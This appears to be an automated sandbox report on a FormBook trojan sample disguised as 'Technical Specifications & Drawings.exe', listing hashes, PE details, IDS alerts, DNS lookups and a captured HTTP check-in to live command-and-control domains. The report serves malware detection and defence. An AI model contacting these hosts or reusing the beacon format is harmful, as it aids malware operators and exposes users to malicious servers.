                                                JNq5qdAzeKGet hashmaliciousBrowse
                                                • 218.225.239.89
                                                O2SWITCHFRnuevo_orden.xlsx.exeGet hashmaliciousBrowse
                                                • 109.234.164.224
                                                SecuriteInfo.com.W32.AIDetectNet.01.17983.exeGet hashmaliciousBrowse
                                                • 109.234.164.224
                                                iOW5Sp6ul4.exeGet hashmaliciousBrowse
                                                • 109.234.164.224
                                                DHL Shipment S2104751056.exeGet hashmaliciousBrowse
                                                • 109.234.164.217
                                                dxnSweoisD.exeGet hashmaliciousBrowse
                                                • 109.234.164.72
                                                two_salary.exeGet hashmaliciousBrowse
                                                • 109.234.164.72
                                                https://0bit.cc/ZWJcGet hashmaliciousBrowse
                                                • 109.234.161.33
                                                https://reurl.cc/anGKD3Get hashmaliciousBrowse
                                                • 109.234.161.33
                                                RFQ08022022.exeGet hashmaliciousBrowse
                                                • 109.234.164.212
                                                Purchase Order.exeGet hashmaliciousBrowse
                                                • 109.234.160.64
                                                Remittance_3239934.xlsxGet hashmaliciousBrowse
                                                • 109.234.164.202
                                                awb_receipt_tracking_27022022_9985193500000000.xlsxGet hashmaliciousBrowse
                                                • 109.234.164.200
                                                SALARY_RECEIPT.exeGet hashmaliciousBrowse
                                                • 109.234.161.241
                                                VSL_MV HANNOR.exeGet hashmaliciousBrowse
                                                • 109.234.164.204
                                                stage4.exeGet hashmaliciousBrowse
                                                • 109.234.160.63
                                                payment.exeGet hashmaliciousBrowse
                                                • 109.234.164.201
                                                Order Information.exeGet hashmaliciousBrowse
                                                • 109.234.164.202
                                                Swift copy.exeGet hashmaliciousBrowse
                                                • 109.234.160.164
                                                ENQUIRYSMRT119862021-ERW PIPES.pdf.exeGet hashmaliciousBrowse
                                                • 185.246.46.93
                                                Unpaid Invoice.exeGet hashmaliciousBrowse
                                                • 109.234.162.39

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Technical Specifications & Drawings.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\Technical Specifications & Drawings.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1308
                                                Entropy (8bit):5.345811588615766
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                C:\Users\user\AppData\Local\Temp\207G7-97P

                                                Download File
                                                Process:C:\Windows\SysWOW64\control.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.792852251086831
                                                Encrypted:false
                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.774223579181345
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:Technical Specifications & Drawings.exe
                                                File size:800256
                                                MD5:9b94f751e8cc145058db9f428c2ad571
                                                SHA1:f12af989efe2b3b11e4784899ca4c6794da17879
                                                SHA256:893a0b655917a18e5886348b39f6023fa851cf3d89e5b8709219ad3d2766fa97
                                                SHA512:02660cedcbf7d4a6d075eaa8bbd79bd560fc88ae1bbe5032348240f499432294f9c889b55f96e5f2e4214b7fe838df647a0cf4afefe2778b831af0d7dfd4e3dd
                                                SSDEEP:24576:hFxgV10E4B8aMrhPemfzId4MaZAOzje9IbUDHDl:tgVWES8z04eOzj7U
                                                TLSH:1805BE0BAF147708C5A76AB5EE0BBD76A7F61C5D3135D0B83A617C0A4AFF301E51242A
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..b..............0..............L... ...`....@.. ....................................@................................

                                                File Icon

                                                Icon Hash:00828e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x4c4cea
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x62F0AC40 [Mon Aug 8 06:25:04 2022 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc4c980x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000x390.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xc2cf00xc2e00False0.8121780287844772data7.780783068719605IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0xc60000x3900x400False0.369140625data2.8640931166907952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xc80000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_VERSION0xc60580x334data

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                192.168.2.367.23.226.11949803802031412 08/08/22-12:28:44.161490TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980380192.168.2.367.23.226.119
                                                192.168.2.367.23.226.11949803802031453 08/08/22-12:28:44.161490TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980380192.168.2.367.23.226.119
                                                192.168.2.367.223.117.7249809802031449 08/08/22-12:28:49.631208TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980980192.168.2.367.223.117.72
                                                192.168.2.367.223.117.7249809802031412 08/08/22-12:28:49.631208TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980980192.168.2.367.223.117.72
                                                192.168.2.367.223.117.7249809802031453 08/08/22-12:28:49.631208TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980980192.168.2.367.223.117.72
                                                192.168.2.367.23.226.11949803802031449 08/08/22-12:28:44.161490TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980380192.168.2.367.23.226.119

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 8, 2022 12:28:32.463253975 CEST4977680192.168.2.3107.155.208.43
                                                Aug 8, 2022 12:28:32.755367041 CEST8049776107.155.208.43192.168.2.3
                                                Aug 8, 2022 12:28:32.755527020 CEST4977680192.168.2.3107.155.208.43
                                                Aug 8, 2022 12:28:32.786432028 CEST4977680192.168.2.3107.155.208.43
                                                Aug 8, 2022 12:28:33.078504086 CEST8049776107.155.208.43192.168.2.3
                                                Aug 8, 2022 12:28:33.078955889 CEST8049776107.155.208.43192.168.2.3
                                                Aug 8, 2022 12:28:33.078989983 CEST8049776107.155.208.43192.168.2.3
                                                Aug 8, 2022 12:28:33.079127073 CEST4977680192.168.2.3107.155.208.43
                                                Aug 8, 2022 12:28:33.302218914 CEST4977680192.168.2.3107.155.208.43
                                                Aug 8, 2022 12:28:33.595402002 CEST8049776107.155.208.43192.168.2.3
                                                Aug 8, 2022 12:28:38.335200071 CEST4978080192.168.2.3109.234.162.62
                                                Aug 8, 2022 12:28:38.365019083 CEST8049780109.234.162.62192.168.2.3
                                                Aug 8, 2022 12:28:38.365221024 CEST4978080192.168.2.3109.234.162.62
                                                Aug 8, 2022 12:28:38.365463018 CEST4978080192.168.2.3109.234.162.62
                                                Aug 8, 2022 12:28:38.395041943 CEST8049780109.234.162.62192.168.2.3
                                                Aug 8, 2022 12:28:38.864422083 CEST8049780109.234.162.62192.168.2.3
                                                Aug 8, 2022 12:28:38.864464045 CEST8049780109.234.162.62192.168.2.3
                                                Aug 8, 2022 12:28:38.864614010 CEST4978080192.168.2.3109.234.162.62
                                                Aug 8, 2022 12:28:38.864650965 CEST4978080192.168.2.3109.234.162.62
                                                Aug 8, 2022 12:28:38.894378901 CEST8049780109.234.162.62192.168.2.3
                                                Aug 8, 2022 12:28:44.019023895 CEST4980380192.168.2.367.23.226.119
                                                Aug 8, 2022 12:28:44.154835939 CEST804980367.23.226.119192.168.2.3
                                                Aug 8, 2022 12:28:44.157953978 CEST4980380192.168.2.367.23.226.119
                                                Aug 8, 2022 12:28:44.161489964 CEST4980380192.168.2.367.23.226.119
                                                Aug 8, 2022 12:28:44.297408104 CEST804980367.23.226.119192.168.2.3
                                                Aug 8, 2022 12:28:44.300245047 CEST804980367.23.226.119192.168.2.3
                                                Aug 8, 2022 12:28:44.300311089 CEST804980367.23.226.119192.168.2.3
                                                Aug 8, 2022 12:28:44.300527096 CEST4980380192.168.2.367.23.226.119
                                                Aug 8, 2022 12:28:44.300573111 CEST4980380192.168.2.367.23.226.119
                                                Aug 8, 2022 12:28:44.436374903 CEST804980367.23.226.119192.168.2.3
                                                Aug 8, 2022 12:28:49.458475113 CEST4980980192.168.2.367.223.117.72
                                                Aug 8, 2022 12:28:49.628911018 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:28:49.631028891 CEST4980980192.168.2.367.223.117.72
                                                Aug 8, 2022 12:28:49.631207943 CEST4980980192.168.2.367.223.117.72
                                                Aug 8, 2022 12:28:49.801218033 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:28:49.902386904 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:28:49.902443886 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:28:49.902481079 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:28:49.902518988 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:28:49.902545929 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:28:49.902592897 CEST4980980192.168.2.367.223.117.72
                                                Aug 8, 2022 12:28:49.902663946 CEST4980980192.168.2.367.223.117.72
                                                Aug 8, 2022 12:28:51.640513897 CEST4980980192.168.2.367.223.117.72
                                                Aug 8, 2022 12:28:51.810667992 CEST804980967.223.117.72192.168.2.3
                                                Aug 8, 2022 12:29:01.721714973 CEST4981780192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:01.971877098 CEST8049817184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:01.972079039 CEST4981780192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:01.972229004 CEST4981780192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:01.972253084 CEST4981780192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:01.972655058 CEST4981880192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:02.222067118 CEST8049817184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:02.227452040 CEST8049818184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:02.227598906 CEST4981880192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:02.227710009 CEST4981880192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:02.232486010 CEST8049817184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:02.232532978 CEST8049817184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:02.232578039 CEST4981780192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:02.232604027 CEST4981780192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:02.482373953 CEST8049818184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:02.489057064 CEST8049818184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:02.489123106 CEST8049818184.168.107.80192.168.2.3
                                                Aug 8, 2022 12:29:02.489309072 CEST4981880192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:02.489403963 CEST4981880192.168.2.3184.168.107.80
                                                Aug 8, 2022 12:29:02.744102001 CEST8049818184.168.107.80192.168.2.3

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 8, 2022 12:28:32.168889046 CEST5298553192.168.2.38.8.8.8
                                                Aug 8, 2022 12:28:32.449382067 CEST53529858.8.8.8192.168.2.3
                                                Aug 8, 2022 12:28:38.314755917 CEST5281053192.168.2.38.8.8.8
                                                Aug 8, 2022 12:28:38.334137917 CEST53528108.8.8.8192.168.2.3
                                                Aug 8, 2022 12:28:43.877885103 CEST5515153192.168.2.38.8.8.8
                                                Aug 8, 2022 12:28:44.018109083 CEST53551518.8.8.8192.168.2.3
                                                Aug 8, 2022 12:28:49.332912922 CEST6481653192.168.2.38.8.8.8
                                                Aug 8, 2022 12:28:49.456350088 CEST53648168.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:01.681569099 CEST4972353192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:01.719481945 CEST53497238.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:07.523072958 CEST5258153192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:08.532000065 CEST5258153192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:09.578977108 CEST5258153192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:11.663458109 CEST5258153192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:12.542298079 CEST53525818.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:12.571427107 CEST5015253192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:13.551590919 CEST53525818.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:13.579313993 CEST5015253192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:14.594968081 CEST5015253192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:14.598031998 CEST53525818.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:16.610747099 CEST5015253192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:16.682765961 CEST53525818.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:17.592346907 CEST53501528.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:18.598768950 CEST53501528.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:19.614202976 CEST53501528.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:21.629395008 CEST53501528.8.8.8192.168.2.3
                                                Aug 8, 2022 12:29:22.596843958 CEST5663953192.168.2.38.8.8.8
                                                Aug 8, 2022 12:29:22.630506992 CEST53566398.8.8.8192.168.2.3

                                                ICMP Packets

                                                TimestampSource IPDest IPChecksumCodeType
                                                Aug 8, 2022 12:29:13.551677942 CEST192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable
                                                Aug 8, 2022 12:29:14.598773003 CEST192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable
                                                Aug 8, 2022 12:29:16.682864904 CEST192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable
                                                Aug 8, 2022 12:29:18.598884106 CEST192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable
                                                Aug 8, 2022 12:29:19.614459038 CEST192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable
                                                Aug 8, 2022 12:29:21.629515886 CEST192.168.2.38.8.8.8cff9(Port unreachable)Destination Unreachable

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Aug 8, 2022 12:28:32.168889046 CEST192.168.2.38.8.8.80x260eStandard query (0)www.kirchhoff-darryl.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:28:38.314755917 CEST192.168.2.38.8.8.80x93aeStandard query (0)www.tomoptique.frA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:28:43.877885103 CEST192.168.2.38.8.8.80xd4b1Standard query (0)www.boshi-eg.onlineA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:28:49.332912922 CEST192.168.2.38.8.8.80x603Standard query (0)www.esandcraic.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:01.681569099 CEST192.168.2.38.8.8.80x7af8Standard query (0)www.mexc-event-partner.siteA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:07.523072958 CEST192.168.2.38.8.8.80x6d06Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:08.532000065 CEST192.168.2.38.8.8.80x6d06Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:09.578977108 CEST192.168.2.38.8.8.80x6d06Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:11.663458109 CEST192.168.2.38.8.8.80x6d06Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:12.571427107 CEST192.168.2.38.8.8.80x4d10Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:13.579313993 CEST192.168.2.38.8.8.80x4d10Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:14.594968081 CEST192.168.2.38.8.8.80x4d10Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:16.610747099 CEST192.168.2.38.8.8.80x4d10Standard query (0)www.gzkanglongkeji.comA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:22.596843958 CEST192.168.2.38.8.8.80xdf98Standard query (0)www.fundycases.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Aug 8, 2022 12:28:32.449382067 CEST8.8.8.8192.168.2.30x260eNo error (0)www.kirchhoff-darryl.com107.155.208.43A (IP address)IN (0x0001)
                                                Aug 8, 2022 12:28:38.334137917 CEST8.8.8.8192.168.2.30x93aeNo error (0)www.tomoptique.frtomoptique.frCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 12:28:38.334137917 CEST8.8.8.8192.168.2.30x93aeNo error (0)tomoptique.fr109.234.162.62A (IP address)IN (0x0001)
                                                Aug 8, 2022 12:28:44.018109083 CEST8.8.8.8192.168.2.30xd4b1No error (0)www.boshi-eg.onlineboshi-eg.onlineCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 12:28:44.018109083 CEST8.8.8.8192.168.2.30xd4b1No error (0)boshi-eg.online67.23.226.119A (IP address)IN (0x0001)
                                                Aug 8, 2022 12:28:49.456350088 CEST8.8.8.8192.168.2.30x603No error (0)www.esandcraic.com67.223.117.72A (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:01.719481945 CEST8.8.8.8192.168.2.30x7af8No error (0)www.mexc-event-partner.sitemexc-event-partner.siteCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 12:29:01.719481945 CEST8.8.8.8192.168.2.30x7af8No error (0)mexc-event-partner.site184.168.107.80A (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:12.542298079 CEST8.8.8.8192.168.2.30x6d06Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:13.551590919 CEST8.8.8.8192.168.2.30x6d06Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:14.598031998 CEST8.8.8.8192.168.2.30x6d06Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:16.682765961 CEST8.8.8.8192.168.2.30x6d06Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:17.592346907 CEST8.8.8.8192.168.2.30x4d10Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:18.598768950 CEST8.8.8.8192.168.2.30x4d10Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:19.614202976 CEST8.8.8.8192.168.2.30x4d10Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:21.629395008 CEST8.8.8.8192.168.2.30x4d10Server failure (2)www.gzkanglongkeji.comnonenoneA (IP address)IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST8.8.8.8192.168.2.30xdf98No error (0)www.fundycases.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST8.8.8.8192.168.2.30xdf98No error (0)gcdn0.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST8.8.8.8192.168.2.30xdf98No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST8.8.8.8192.168.2.30xdf98No error (0)5f36b111-balancer.wixdns.nettd-balancer-199-15-163-148.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 12:29:22.630506992 CEST8.8.8.8192.168.2.30xdf98No error (0)td-balancer-199-15-163-148.wixdns.net199.15.163.148A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.kirchhoff-darryl.com
                                                • www.tomoptique.fr
                                                • www.boshi-eg.online
                                                • www.esandcraic.com
                                                • www.mexc-event-partner.site

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.349776107.155.208.4380C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 12:28:32.786432028 CEST7566OUTGET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.kirchhoff-darryl.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 12:28:33.078955889 CEST7566INHTTP/1.1 301 Moved Permanently
                                                Date: Mon, 08 Aug 2022 10:28:32 GMT
                                                Server: Apache/2.2.15 (CentOS)
                                                Location: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_
                                                Content-Length: 457
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
